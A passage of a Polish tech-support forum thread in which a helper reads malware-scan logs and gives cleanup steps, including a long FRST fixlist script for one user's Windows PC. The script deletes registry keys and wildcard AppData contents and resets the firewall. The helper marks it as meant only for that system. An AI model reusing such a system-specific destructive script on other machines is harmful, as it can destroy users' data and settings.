wytycznymi z KB950375. Wklej do Notatnika skrypt podany na stronie, zapisz pod nazwą FIX.VBS, plik umieścić na C:\, następnie Start > w polu szukania cmd > z prawokliku Uruchom jako Administrator > wklep C:\FIX.VBS i ENTER.

Wszystko pomyślnie wykonane. Teraz zrób skan za pomocą Hitman Pro i dostarcz wynikowy raport.

Operacje pomyślnie wykonane. Teraz: 1. Ostatnia drobna poprawka. Otwórz Notatnik i wklej w nim: Task: {B7FDD4C4-27FF-4DD4-89CA-DB3BC9D5EBA7} - System32\Tasks\Adobe Reader and Acrobat Manager => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe DeleteQuarantine: Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Tym razem nie będzie restartu. Przedstaw wynikowy fixlog.txt. Po jego pokazaniu: 2. Zastosuj DelFix oraz wyczyść foldery Przywracania systemu: KLIK. 3. Cały system do aktualizacji. Stan obecny to brak SP2, IE9 i reszty łat: Platform: Microsoft® Windows Vista™ Home Premium Service Pack 1 (X86) Język: Polski (Polska) Internet Explorer Wersja 7 (Domyślna przeglądarka: FF) A na koniec zainstaluj Adobe Reader XI 11.0.14. Linki pobierania w w/w linku.

Wejdź w Tryb awaryjny Windows i ponów zadanie ze skryptem FRST.

Temat przenoszę do działu Windows. Nic tu nie wskazuje, by problemy nadal tworzyła infekcja, są jakieś mało istotne martwe szczątki adware. Natomiast problem może tworzyć: instalacja Panda (to świeży nabytek) i/lub uszkodzenia plików Windows (notuję przynajmniej jeden niepodpisany cyfrowo plik Microsoftu). S3 msiserver; C:\Windows\System32\msiexec.exe [65536 2015-09-10] (Microsoft Corporation) [brak podpisu cyfrowego] Wstępnie: 1. Szybkie doczyszczenie szczątków w spoilerze. 2. Wykonaj sprawdzanie sfc /scannow i dostarcz wynikowy przefiltrowany log: KLIK.

rocklee, zasady działu wyranie mówią, że należy przedstawić raporty ze skanerów, jeśli coś wykrywają. Zaprezentuj te raporty, które nadal coś pokazują, bo skąd mogę wiedzieć co i gdzie.

Temat czyszczę, posty łączę. punisher935, jest na forum opis tworzenia raportów FRST: KLIK. Wyraźnie jest napisane, że mają być podane trzy logi: FRST.txt, Addition.txt, Shortcut.txt. Podałeś tylko jeden. Temat nie jest skończony. Skoro coś robiłeś, to należy opisać co dokładnie oraz zrobić nowe logi FRST po tych działach (wszystkie trzy).

Brak oznak czynnej infekcji i nie jest ona na pewno przyczyną "spadku wydajności". Natomiast wspominasz problemy sprzętowe, które jak najbardziej mogą się wiązać. Rozwiń o co chodzi z płytą główną, a temat przenoszę do działu Hardware. Materiały dostarczane w dziale: KLIK. PS. Odinstaluj zbędny WebStorage ASUSa. W spoilerze zaś doczyszczanie szczątków adware i wpisów pustych, co nie ma żadnego związku z w/w problemami.

Wszystko pomyślnie zrobione. Kończymy: 1. Skasuj z Pulpitu folder FRST. Następnie zastosuj DelFix oraz wyczyść foldery Przywracania systemu: KLIK. 2. Stan aktualizacji Windows fatalny. Brak SP1, IE11 i reszty łat. Do wykonania kompleksowa aktualizacja Windows. Do załadowania będzie prawdopodobnie kilkaset aktualizacji i może to długo trwać. Platform: Microsoft Windows 7 Ultimate (X86) Język: Polski (Polska) Internet Explorer Wersja 8 (Domyślna przeglądarka: Chrome)

Poprawki: 1. W Google Chrome: Zresetuj synchronizację (o ile włączona), punkt 2: KLIK. Ustawienia > karta Ustawienia > Po uruchomieniu > Otwórz konkretną stronę lub zestaw stron > usuń adres yoursearching.com, przestaw na "Otwórz stronę nowej karty" 2. Uruchom AdwCleaner. Wybierz opcję Skanuj i dostarcz log wynikowy z folderu C:\AdwCleaner.

Opisz problem, o jakie "wirusy" chodzi, gdzie wykryte, co się dzieje. W raportach nie widać żadnych "wirusów", są tylko drobne szczątki adware i wpisy puste, czym zajmę się po otrzymaniu informacji jaki konkretnie masz problem.

Zgłoszenia URL:Mal tworzy malware wykorzystujące następującą klasę użytkownika: CustomCLSID: HKU\S-1-5-21-2807787745-202846158-3995719364-1000_Classes\CLSID\{F6BF8414-962C-40FE-90F1-B80A7E72DB9A}\InprocServer32 -> C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\ddrawex.dll (Brother Industries, Ltd.) Droga nabycia to exploity Adobe: KLIK. Posiadasz niebezpieczne stare wersje Adobe Flash. Malware na pewno nie zostało nabyte podczas aktualizacji KMPlayer. Działania do przeprowadzenia: 1. Odinstaluj stare wersje: Acrobat.com, Adobe AIR, Adobe Flash Player 17 ActiveX, Adobe Flash Player 18 NPAPI, Google Talk Plugin (już nie działa), Java SE Development Kit 8 Update 60 (64-bit), JavaFX 2.1.1, Spelling Dictionaries Support For Adobe Reader 9. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: (Microsoft Corporation) C:\Windows\explorer.exe CreateRestorePoint: CustomCLSID: HKU\S-1-5-21-2807787745-202846158-3995719364-1000_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\Jakub\AppData\Local\Google\Update\1.3.29.1\psuser_64.dll => Brak pliku CustomCLSID: HKU\S-1-5-21-2807787745-202846158-3995719364-1000_Classes\CLSID\{F6BF8414-962C-40FE-90F1-B80A7E72DB9A}\InprocServer32 -> C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\ddrawex.dll (Brother Industries, Ltd.) Task: {19008DFC-2C51-4C29-961F-A4865D9C9616} - System32\Tasks\Game_Booster_AutoUpdate => C:\Program Files (x86)\IObit\Game Booster 3\AutoUpdate.exe Task: {5CD7C4C3-2201-4F69-8872-BF51E298DAD8} - System32\Tasks\{AF732C50-561D-4080-B3DC-60CDBDD7CD53} => pcalua.exe -a E:\Steam\steam.exe -c steam://uninstall/570 Task: {70B4BDDE-0EB1-4E35-BBB2-1927D21CA235} - System32\Tasks\{043EEFC9-FCF7-4094-9B60-1677DADE5838} => pcalua.exe -a C:\Users\Jakub\AppData\Roaming\qone8\UninstallManager.exe -c -ptid=smt Task: {BE2F6CE4-44E9-427C-9026-E5E047B8A473} - System32\Tasks\{8DD4452B-73CD-4F2F-BD1E-3EDF51FE1CD8} => pcalua.exe -a H:\setup.exe -d H:\ Task: {FCEE956C-3717-4F8F-AC06-1701184D91AE} - System32\Tasks\{DFE44FA3-5F33-4403-A175-583420379A71} => pcalua.exe -a E:\carbon\EAUninstall.exe S3 cmudaxp; system32\drivers\cmudaxp.sys [X] S3 EagleX64; \??\C:\Windows\system32\drivers\EagleX64.sys [X] S3 netr28ux; system32\DRIVERS\netr28ux.sys [X] HKU\S-1-5-21-2807787745-202846158-3995719364-1000\...\Run: [zASRockInstantBoot] => [X] HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com SearchScopes: HKU\S-1-5-21-2807787745-202846158-3995719364-1000 -> {C2741F95-FA91-481f-995A-BA628352CC41} URL = hxxp://www.google.com/cse?cx=partner-pub-3794288947762788%3A4107735745&ie=UTF-8&q=&sa=Search&siteurl=www.google.com%2Fcse%2Fhome%3Fcx%3Dpartner-pub-3794288947762788%3A4107735745&q={searchTerms} SearchScopes: HKU\S-1-5-21-2807787745-202846158-3995719364-1000 -> {D2D7B86C-C473-4f13-BF4F-59AB573AD9A3} URL = hxxp://uk.search.yahoo.com/search?p={searchTerms}&fr=chr-devicevm&type=PROTOSV Toolbar: HKLM - avast! Online Security - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - Brak pliku Toolbar: HKLM - Brak nazwy - {CC1A175A-E45B-41ED-A30C-C9B1D7A0C02F} - Brak pliku DPF: HKLM-x32 {D27CDB6E-AE6D-11CF-96B8-444553540000} hxxps://fpdownload.macromedia.com/get/shockwave/cabs/flash/swflash.cab DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Adobe Reader Speed Launcher DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\AdobeBridge DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\ASRockXTU DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\ESL Wire DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\GG DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\LightScribe Control Panel DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\LogMeIn Hamachi Ui DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\NBAgent DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Spotify Web Helper DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\SpybotSD TeaTimer DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins DeleteKey: HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes DeleteKey: HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes DeleteKey: HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8} C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop Lightroom 3.4 64-bit.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DiRT Rally.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EZ CD Audio Converter.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Grand Theft Auto V.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Project CARS.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Codemasters C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Ekierowca C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EZ CD Audio Converter C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Goat Simulator C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Rockstar Games C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Image-Line C:\Users\Jakub\AppData\Local\*.* C:\Users\Jakub\AppData\Local\Eclipse C:\Users\Jakub\AppData\Local\Ektion C:\Users\Jakub\AppData\Local\Mozilla C:\Users\Jakub\AppData\Local\MSfree Inc C:\Users\Jakub\AppData\Local\Microsoft\Windows\GameExplorer\{54A67A6E-9321-45A9-AEC9-F0B488C3B0B0} C:\Users\Jakub\AppData\Local\Microsoft\Windows\GameExplorer\{9299C7A8-7B49-416D-923F-3EB861435D92} C:\Users\Jakub\AppData\Roaming\*.* C:\Users\Jakub\AppData\Roaming\Scenography C:\Users\Jakub\AppData\Roaming\Microsoft\Windows\GameExplorer\PlayTasks C:\Users\Jakub\AppData\Roaming\Microsoft\Windows\GameExplorer\SupportTasks C:\Users\Jakub\AppData\Roaming\Microsoft\Windows\SendTo\Znajomy Xfire.lnk C:\Users\Jakub\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Eclipse C:\Users\Jakub\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Image-Line C:\Users\Jakub\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Rocksmith 2014 C:\Users\Jakub\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StarCraft II C:\Users\Jakub\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ubisoft C:\Users\Jakub\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\War Thunder C:\Users\Jakub\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WarThunderDev C:\Users\Jakub\AppData\Roaming\Mozilla C:\Users\Public\Desktop\Lightroom 3.4 64-bit.lnk C:\Users\Jakub\Downloads\*.crdownload CMD: netsh advfirewall reset CMD: SET EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Napraw uszkodzony specjalny skrót IE. W pasku eksploratora wklej poniższą ścieżkę i ENTER: C:\Users\Jakub\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools Prawoklik na zlokalizowany tam skrót Internet explorer (bez dodatków) > Właściwości > w polu Element docelowy po ścieżce "C:\Program Files\Internet Explorer\iexplore.exe" dopisz dwie spacje i -extoff 4. Zrób nowy log FRST z opcji Skanuj (Scan), na następujących opcjach: zaznacz pola Lista BCD oraz Addition, Shortcut już nie jest potrzebny. Dołącz też plik fixlog.txt.